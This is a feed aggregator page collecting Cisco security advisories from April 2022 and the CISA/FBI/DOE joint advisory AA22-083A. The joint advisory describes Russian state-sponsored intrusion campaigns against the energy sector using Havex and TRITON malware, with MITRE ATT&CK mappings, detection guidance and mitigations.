Feed aggregator

Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Cross-Site Request Forgery Vulnerability

Cisco Security Advisories - Wed, 2022-04-06 23:00
<p>A vulnerability in the web-based management interface of Cisco&nbsp;IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of the web-based interface of an affected system.</p> <p>This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an authenticated user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform configuration changes on the affected device, resulting in a denial of service (DoS) condition.</p> <p>Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.</p> <p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phone-csrf-K56vXvVx" target="_blank">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phone-csrf-K56vXvVx</a></p>
Security Impact Rating: Medium
CVE: CVE-2022-20774
Categories: Security Alerts

Cisco Web Security Appliance Filter Bypass Vulnerability

Cisco Security Advisories - Wed, 2022-04-06 23:00
<p>A vulnerability in the Web-Based Reputation Score (WBRS) engine of Cisco&nbsp;AsyncOS Software for Cisco&nbsp;Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to bypass established web request policies and access blocked content on an affected device.</p> <p>This vulnerability is due to incorrect handling of certain character combinations inserted into a URL. An attacker could exploit this vulnerability by sending crafted URLs to be processed by an affected device. A successful exploit could allow the attacker to bypass the web proxy and access web content that has been blocked by policy.</p> <p>Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.</p> <p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-swa-filter-bypass-XXXTU3X" target="_blank">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-swa-filter-bypass-XXXTU3X</a></p>
Security Impact Rating: Medium
CVE: CVE-2022-20784
Categories: Security Alerts

Cisco Secure Network Analytics Network Diagrams Application Cross-Site Scripting Vulnerability

Cisco Security Advisories - Wed, 2022-04-06 23:00
<p>A vulnerability in the web-based management interface of the Network Diagrams application for Cisco&nbsp;Secure Network Analytics, formerly Stealthwatch Enterprise, could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.</p> <p>This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</p> <p>Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.</p> <p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-xss-mCA9tQnJ" target="_blank">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-xss-mCA9tQnJ</a></p> <p><strong>Attention</strong>: Simplifying the Cisco&nbsp;portfolio includes the renaming of security products under one brand: Cisco&nbsp;Secure. For more information, see <a href="https://www.cisco.com/c/en/us/products/security/secure-names.html">Meet Cisco&nbsp;Secure</a>.</p>
Security Impact Rating: Medium
CVE: CVE-2022-20741
Categories: Security Alerts

Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability

Cisco Security Advisories - Wed, 2022-04-06 23:00
<p>A vulnerability in the web-based management interface of Cisco&nbsp;Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information from an affected device.</p> <p>This vulnerability is due to improper enforcement of administrative privilege levels for high-value sensitive data. An attacker with <em>read-only</em> <em>Administrator </em>privileges to the web-based management interface on an affected device could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to collect sensitive information regarding the configuration of the system.</p> <p>Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.</p> <p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-info-exp-YXAWYP3s" target="_blank">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-info-exp-YXAWYP3s</a></p>
Security Impact Rating: Medium
CVE: CVE-2022-20782
Categories: Security Alerts

Vulnerability in Spring Framework Affecting Cisco Products: March 2022

Cisco Security Advisories - Sat, 2022-04-02 06:45
<p>On March 31, 2022, the following critical vulnerability in the Spring Framework affecting Spring MVC and Spring WebFlux applications running on JDK 9+ was released:&nbsp;</p> <p>&nbsp; &nbsp; CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+</p> <p>For a description of this vulnerability, see <a href="https://tanzu.vmware.com/security/cve-2022-22965">VMware Spring Framework Security Vulnerability Report</a>.</p> <p>This advisory will be updated as additional information becomes available.</p> <p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67</a></p>
Security Impact Rating: Critical
CVE: CVE-2022-22965
Categories: Security Alerts

Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022

Cisco Security Advisories - Sat, 2022-04-02 06:45
<p>On March 29, 2022, the following critical vulnerability in the Spring Cloud Function Framework affecting releases 3.1.6, 3.2.2, and older unsupported releases was disclosed: &nbsp;</p> <p>CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression</p> <p>For a description of this vulnerability, see <a href="https://tanzu.vmware.com/security/cve-2022-22963">VMware Spring Framework Security Vulnerability Report</a>.</p> <p>This advisory will be updated as additional information becomes available.</p> <p><strong>Cisco's Response to This Vulnerability</strong></p> <p>Cisco&nbsp;is investigating all products for impact from CVE-2022-22963. To help detect exploitation of this vulnerability, Cisco&nbsp;has released Snort rules at the following location: <a href="https://www.snort.org/rule_docs/1-59388">Talos Rule SID 59388</a></p> <p>This advisory is available at the following link:<br><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH" target="_blank">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH</a></p>
Security Impact Rating: Critical
CVE: CVE-2022-22963
Categories: Security Alerts

AA22-083A: Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector

US-CERT - Thu, 2022-03-24 07:00
Original release date: March 24, 2022
Summary

Actions to Take Today to Protect Energy Sector Networks:
• Implement and ensure robust network segmentation between IT and ICS networks.
• Enforce MFA to authenticate to a system.
• Manage the creation of, modification of, use of—and permissions associated with—privileged accounts.

This joint Cybersecurity Advisory (CSA)—coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Energy (DOE)—provides information on multiple intrusion campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 and targeted U.S. and international Energy Sector organizations. CISA, the FBI, and DOE responded to these campaigns with appropriate action in and around the time that they occurred. CISA, the FBI, and DOE are sharing this information in order to highlight historical tactics, techniques, and procedures (TTPs) used by adversaries to target U.S. and international Energy Sector organizations.

On March 24, 2022, the U.S. Department of Justice unsealed indictments of three Russian Federal Security Service (FSB) officers and a Russian Federation Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM) employee for their involvement in the following intrusion campaigns against U.S. and international oil refineries, nuclear facilities, and energy companies.[1]

  • Global Energy Sector Intrusion Campaign, 2011 to 2018: the FSB conducted a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data. 
    • One of the indicted FSB officers was involved in campaign activity that involved deploying Havex malware to victim networks. 
    • The other two indicted FSB officers were involved in activity targeting U.S. Energy Sector networks from 2016 through 2018.
  • Compromise of Middle East-based Energy Sector organization with TRITON Malware, 2017: Russian cyber actors with ties to the TsNIIKhM gained access to and leveraged TRITON (also known as HatMan) malware to manipulate a foreign oil refinery’s ICS controllers. TRITON was designed to specifically target Schneider Electric’s Triconex Tricon safety systems and is capable of disrupting those systems. Schneider Electric has issued a patch to mitigate the risk of the TRITON malware’s attack vector; however, network defenders should install the patch and remain vigilant against these threat actors’ TTPs.
    • The indicted TsNIIKhM cyber actor is charged with attempt to access U.S. protected computer networks and to cause damage to an energy facility.
    • The indicted TsNIIKhM cyber actor was a co-conspirator in the deployment of the TRITON malware in 2017.

This CSA provides the TTPs used by indicted FSB and TsNIIKhM actors in cyber operations against the global Energy Sector. Specifically, this advisory maps TTPs used in the global Energy Sector campaign and the compromise of the Middle East-based Energy Sector organization to the MITRE ATT&CK for Enterprise and ATT&CK for ICS frameworks.

CISA, the FBI, and DOE assess that state-sponsored Russian cyber operations continue to pose a threat to U.S. Energy Sector networks. CISA, the FBI, and DOE urge the Energy Sector and other critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory and Appendix A to reduce the risk of compromise. 

For more information on Russian state-sponsored malicious cyber activity, see CISA's Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA's Shields Up Technical Guidance webpage. 

Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s (DOS) Rewards for Justice program. You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to rewardsforjustice.net.

Click here for a PDF version of this report. 

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10, and the ATT&CK for ICSs framework. See the ATT&CK for Enterprise and ATT&CK for ICS frameworks for all referenced threat actor tactics and techniques.

Global Energy Sector Intrusion Campaign, 2011 to 2018

From at least 2011 through 2018, the FSB (also known as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala) conducted an intrusion campaign against international and U.S. Energy Sector organizations. The threat actor gained remote access to and deployed malware designed to collect ICS-related information on compromised Energy Sector networks, and exfiltrated enterprise and ICS data.

Beginning in 2013 and continuing through 2014, the threat actor leveraged Havex malware on Energy Sector networks. The threat actor gained access to these victim networks via spearphishing emails, redirects to compromised websites, and malicious versions of legitimate software updates on multiple ICS vendor websites. The new software updates contained installations of Havex malware, which infected systems of users who downloaded the compromised updates.

Havex is a remote access Trojan (RAT) that communicates with a command and control (C2) server. The C2 server deploys payloads that enumerate all collected network resources and uses the Open Platform Communications (OPC) standard to gather information about connected control systems devices and resources within the network. Havex allowed the actor to install additional malware and extract data, including system information, lists of files and installed programs, e-mail address books, and virtual private network (VPN) configuration files. The Havex payload can cause common OPC platforms to crash, which could cause a denial-of-service condition on applications that rely on OPC communications. Note: for additional information on Havex, see to CISA ICS Advisory ICS Focused Malware and CISA ICS Alert ICS Focused Malware (Update A).

Beginning in 2016, the threat actor began widely targeting U.S. Energy Sector networks. The actor conducted these attacks in two stages: first targeting third-party commercial organizations (such as vendors, integrators, and suppliers) and then targeting Energy Sector organizations. The threat actor used the compromised third-party infrastructure to conduct spearphishing, watering hole, and supply chain attacks to harvest Energy Sector credentials and to pivot to Energy Sector enterprise networks. After obtaining access to the U.S. Energy Sector networks, the actor conducted network discovery, moved laterally, gained persistence, then collected and exfiltrated information pertaining to ICS from the enterprise, and possibly operational technology (OT), environments. Exfiltrated information included: vendor information, reference documents, ICS architecture, and layout diagrams.

For more detailed information on FSB targeting of U.S. Energy Sector networks, See CISA Alert Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors.  

Refer to Appendix A for TTPs of Havex malware and TTPs used by the actor in the 2016 to 2018 targeting of U.S. Energy Sector networks, as well as associated mitigations.

Compromise of Middle East-based Energy Sector Organization with TRITON Malware, 2017

In 2017, Russian cyber actors with ties to TsNIIKhM gained access to and manipulated a foreign oil refinery’s safety devices. TsNIIKhM actors used TRITON malware on the ICS controllers, which resulted in the refinery shutting down for several days. 

TRITON is a custom-built, sophisticated, multi-stage malware affecting Schneider Electric’s Triconex Tricon, a safety programmable logic controller (PLC) (also referred to as a safety instrumented system [SIS]), which monitors industrial processes to prevent hazardous conditions. TRITON is capable of directly interacting with, remotely controlling, and compromising these safety systems. As these systems are used in a large number of environments, the capacity to disable, inhibit, or modify the ability of a process to fail safely could result in physical consequences. Note: for additional information on affected products, see to CISA ICS Advisory Schneider Electric Triconex Tricon (Update B).

TRITON malware affects Triconex Tricon PLCs by modifying in-memory firmware to add additional programming. The extra functionality allows an attacker to read/modify memory contents and execute custom code, disabling the safety system. 

TRITON malware has multiple components, including a custom Python script, four Python modules, and malicious shellcode that contains an injector and a payload. For detailed information on TRITON’s components, refer to CISA Malware Analysis Report (MAR): HatMan: Safety System Targeted Malware (Update B).

Note: the indicted TsNIIKhM cyber actor was also involved in activity targeting U.S. Energy Sector companies in 2018, and other TsNIIKhM-associated actors have targeted a U.S.-based company’s facilities in an attempt to access the company’s OT systems. To date, CISA, FBI, and DOE have no information to indicate these actors have intentionally disrupted any U.S. Energy Sector infrastructure. 

Refer to Appendix A for TTPs used by TRITON as well as associated mitigations. 

MitigationsEnterprise Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their corporate enterprise network. These mitigations are tailored to combat multiple enterprise techniques observed in these campaigns (refer to Appendix A for observed TTPs and additional mitigations).

Privileged Account Management 
  • Manage the creation of, modification of, use of—and permissions associated with—privileged accounts, including SYSTEM and root.
Password Policies
  • Set and enforce secure password policies for accounts.
Disable or Remove Features or Programs
  • Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
Audit 
  • Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.
Operating System Configuration 
  • Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
Multifactor Authentication
  • Enforce multifactor authentication (MFA) by requiring users to provide two or more pieces of information (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.
Filter Network Traffic    
  • Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
Network Segmentation
  • Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a demilitarized zone (DMZ) to contain any internet-facing services that should not be exposed from the internal network.
Limit Access to Resources over the Network
  • Prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, Remote Desktop Protocol (RDP) gateways, etc.
Execution Prevention
  • Block execution of code on a system through application control, and/or script blocking.
Industrial Control System Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their ICS/OT environment.

Network Segmentation
  • Implement and ensure robust network segmentation between IT and ICS networks to limit the ability of cyber threat actors to move laterally to ICS networks if the IT network is compromised. 
    • Implement a network topology for ICS that has multiple layers, with the most critical communications occurring in the most secure and reliable layer. For more information refer to National Institute of Standard and Technology Special Publication 800-82: Guide to Industrial Control Systems (ICS) Security. Further segmentation should be applied to portions of the network that are reliant on one another by functionality. Figure 5 on page 26 of the CISA ICS Defense in Depth Strategy document describes this architecture.
    • Use one-way communication diodes to prevent external access, whenever possible.
    • Set up DMZs to create a physical and logical subnetwork that acts as an intermediary for connected security devices to avoid exposure.
    • Employ reliable network security protocols and services where feasible.
  • Consider using virtual local area networks (VLANs) for additional network segmentation, for example, by placing all printers in separate, dedicated VLANs and restricting users’ direct printer access. This same principle can be applied to segmentation of portions of the process for which devices are used. As an example, systems that are only involved in the creation of one component within an assembly line that is not directly related to another component can be on separate VLANs, which allows for identification of any unexpected communication, as well as segmentation against potential risk exposure on a larger scale.
  • Implement perimeter security between network segments to limit the ability of cyber threat actors to move laterally. 
    • Control traffic between network segments by using firewalls, intrusion detection systems (IDSs), and rules for filtering traffic on routers and switches.
    • Implement network monitoring at key chokepoints—including egress points to the internet, between network segments, core switch locations—and at key assets or services (e.g., remote access services).
    • Configure an IDS to create alarms for any ICS traffic outside normal operations (after establishing a baseline of normal operations and network traffic).
    • Configure security incident and event monitoring to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.
ICS Best Practices
  • Update all software. Use a risk-based assessment strategy to determine which ICS networks, assets, and zones should participate in the patch management program. 
  • Test all patches in out-of-band testing environments before implementation into production environments.
  • Implement application allow listing on human machine interfaces and engineering workstations.
  • Harden software configuration on field devices, including tablets and smartphones.
  • Replace all end-of-life software and hardware devices.
  • Disable unused ports and services on ICS devices (after testing to ensure this will not affect ICS operation).
  • Restrict and manage remote access software. Enforce MFA for remote access to ICS networks.
  • Configure encryption and security for network protocols within the ICS environment.
  • Do not allow vendors to connect their devices to the ICS network. Use of a compromised device could introduce malware. 
  • Disallow any devices that do not live solely on the ICS environment from communicating on the platform. ‘Transient devices’ provide risk exposure to the ICS environment from malicious activity in the IT or other environments to which they connect.
  • Maintain an ICS asset inventory of all hardware, software, and supporting infrastructure technologies. 
  • Maintain robust host logging on critical devices within the ICS environment, such as jump boxes, domain controllers, repository servers, etc. These logs should be aggregated into a centralized log server for review. 
  • Ensure robust physical security is in place to prevent unauthorized personal from accessing controlled spaces that house ICS equipment.
  • Regularly test manual controls so that critical functions can be kept running if ICS/OT networks need to be taken offline.
Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

References

[1] https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
[2] https://collaborate.mitre.org/attackics/index.php/Software/S0003 
[3] https://collaborate.mitre.org/attackics/index.php/Software/S0003
[4] https://collaborate.mitre.org/attackics/index.php/Software/S0013 

APPENDIX A: CAMPAIGN AND MALWARE TACTICS, TECHNIQUES, AND PROCEDURES Global Energy Sector Campaign: Havex Malware 

Table 1 maps Havex’s capabilities to the ATT&CK for Enterprise framework, and table 2 maps Havex’s capabilities to the ATT&CK for ICS framework. Table 1 also provides associated mitigations. For additional mitigations, refer to the Mitigations section of this advisory.

Table 1: Enterprise Domain Tactics and Techniques for Havex [2]

Tactic Technique Use Detection/Mitigations

Persistence [TA0003]

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

Havex adds Registry Run keys to achieve persistence.

Monitor: monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.

Privilege Escalation [TA0004]

Process Injection [T1055]

Note: this technique also applies to:

  • Tactic: Defense Evasion [TA0005]

Havex injects itself into explorer.exe.

Behavior Prevention on End Point: use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, Application Programming Interface (API) call, etc., behavior.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Defense Evasion [TA0005]

Indicator Removal on Host: File Deletion [T1070.004]

Havex contains a cleanup module that removes traces of itself from victim networks.

Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network, which an adversary could introduce. Some monitoring tools may collect command-line arguments but may not capture DEL commands since DEL is a native function within cmd.exe.

Credential Access [TA0006]

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

Havex may contain a publicly available web browser password recovery tool.

Password Policies: set and enforce secure password policies for accounts.

Discovery [TA0007]

Account Discovery: Email Account [T1087.003]

Havex collects address book information from Outlook

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation (WMI) and PowerShell.

File and Directory Discovery [T1083]

Havex collects information about available drives, default browser, desktop file list, My Documents, internet history, program files, and root of available drives.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

Process Discovery [T1057]

Havex collects information about running processes.

Monitor: normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

System Information Discovery [T1082]

Havex collects information about the OS and computer name.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.

System Network Configuration Discovery [T1016]

Havex collects information about the internet adapter configuration.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell. System Owner/User Discovery [T1033] Havex collects usernames.

Collection [TA0009]

Archive Collected Data [T1560]

Havex writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Command and Control [TA0011]

Data Encoding: Standard Encoding [T1132.001]

Havex uses standard Base64 + bzip2 or standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.

Detect: analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes using the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

 

Table 2: ICS Domain Tactics and Techniques for Havex [3]

Tactic Technique Use Initial Access Spearphishing Attachment [T0865] Havex is distributed through a Trojanized installer attached to emails.

Supply Chain Compromise [T0862]

Note: this activity also applies to Tactic: Drive by Compromise [T0817]

Havex is distributed through Trojanized installers planted on compromised vendor websites. Execution User Execution [T0863] Execution of Havex relies on a user opening a Trojanized installer attached to an email. Discovery Remote System Discovery [T0846] Havex uses Windows networking (WNet) to discover all the servers, including OPC servers that are reachable by the compromised machine over the network. Remote System Information Discovery [T0888] Havex gathers server information, including CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth. Collection Automated Collection [T0802] Havex gathers information about connected control systems devices. Point & Tag Identification [T0861] Havex can enumerate OPC tags; specifically tag name, type, access, and ID. Inhibit Response Function Denial of Service [T0814] Havex has caused multiple common OPC platforms to intermittently crash.  Impact Denial of Control [T0813] Havex can cause PLCs inability to control connected systems.   Global Energy Sector Campaign: 2016 to 2018 U.S. Energy Sector Targeting

Table 3 maps the 2016 to 2018 U.S. Energy Sector targeting activity to the MITRE ATT&CK Enterprise framework. Mitigations for techniques are also provided in table. For additional mitigations, refer to the Mitigations section of this advisory.

Table 3: Energy Sector Campaign, 2016 to 2018 targeting U.S. Energy Sector: Observed MITRE ATT&CK Enterprise Tactics and Techniques

Tactic Technique Use  Detection/Mitigations Reconnaissance [TA0043] Gather Victim Identity Information: Credentials [T1589.001]

The threat actor harvested credentials of third-party commercial organizations by sending spearphishing emails that contained a PDF attachment. The PDF attachment contained a shortened URL that, when clicked, led users to a website that prompted the user for their email address and password.
The threat actor harvested credentials of Energy Sector targets by sending spearphishing emails with a malicious Microsoft Word document or links to the watering holes created on compromised third-party websites.

Note: this activity also applies to: 

  • Tactic: Reconnaissance [TA0043], Technique: Phishing for Information [T1598]:

Software Configuration: implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Resource Development [TA0042] Compromise Infrastructure: Server [T1584.004] The threat actor created watering holes on compromised third-party organizations’ domains. This activity typically takes place outside the visibility of target organizations, making detection of this behavior difficult. Ensure that users browse the internet securely. Prevent intentional and unintentional download of malware or rootkits, and users from accessing infected or malicious websites. Treat all traffic as untrusted, even if it comes from a partner website or popular domain. Initial Access [TA0001] Valid Accounts [T1078] The threat actor obtained access to Energy Sector targets by leveraging compromised third-party infrastructure and previously compromised Energy Sector credentials against remote access services and infrastructure—specifically VPN, RDP, and Outlook Web Access—where MFA was not enabled.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Update Software: perform regular software updates to mitigate exploitation risk.

Exploit Protection: use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

Application Isolation and Sandboxing: restrict execution of code to a virtual environment on or in transit to an endpoint system.

External Remote Services [T1133] The threat actor installed VPN clients on compromised third-party targets to connect to Energy Sector networks.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Execution 
[TA0002] Command and Scripting Interpreter: PowerShell [T1059.001]

During an RDP session, the threat actor used a PowerShell Script to create an account within a victim’s Microsoft Exchange Server. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001

Antivirus/Antimalware: use signatures or heuristics to detect malicious software.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]

The threat actor used a JavaScript with an embedded Command Shell script to:

  • Create a local administrator account; 
  • Disable the host-based firewall;
  • Globally open port 3389 for RDP access; and
  • Attempt to add the newly created account to the administrators group to gain elevated privileges. 

Note: this activity also applies to: 

  • Tactic: Credential Access [TA0006], Technique: Input Capture [T1056]
  • Tactic: Execution [TA0002], Technique: Command and Scripting Interpreter: JavaScript [T1059.007]
  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]
Execution Prevention: block execution of code on a system through application control, and/or script blocking. Scheduled Task/Job: Scheduled Task [T1053.005] The threat actor created a Scheduled Task to automatically log out of a newly created account every eight hours.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Harden Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification of, use of, and permissions associated with user accounts.

Persistence [TA0003] Create Account: Local Account [T1136.001]  The threat actor created local administrator accounts on previously compromised third-party organizations for reconnaissance and to remotely access Energy Sector targets.    MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Server Software Component: Web Shell [T1505.003] The threat actor created webshells on Energy Sector targets’ publicly accessible email and web servers. Detect: the portion of the webshell that is on the server may be small and look innocuous. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. Defense Evasion [TA0005] Indicator Removal on Host: Clear Windows Event Logs [T1070.001]

The threat actor created new accounts on victim networks to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. 

The threat actor also removed applications they installed while they were in the network along with any logs produced. For example, the VPN client installed at one third-party commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Encrypt Sensitive Information: protect sensitive information with strong encryption.

Remote Data Storage: use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Indicator Removal on Host: File Deletion [T1070.004]

The threat actor cleaned up target networks by deleting created screenshots and specific registry keys. 

The threat actor also deleted all batch scripts, output text documents, and any tools they brought into the environment, such as scr.exe.

Note: this activity also applies to:

  • Technique: Modify Registry [T1112]
Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.
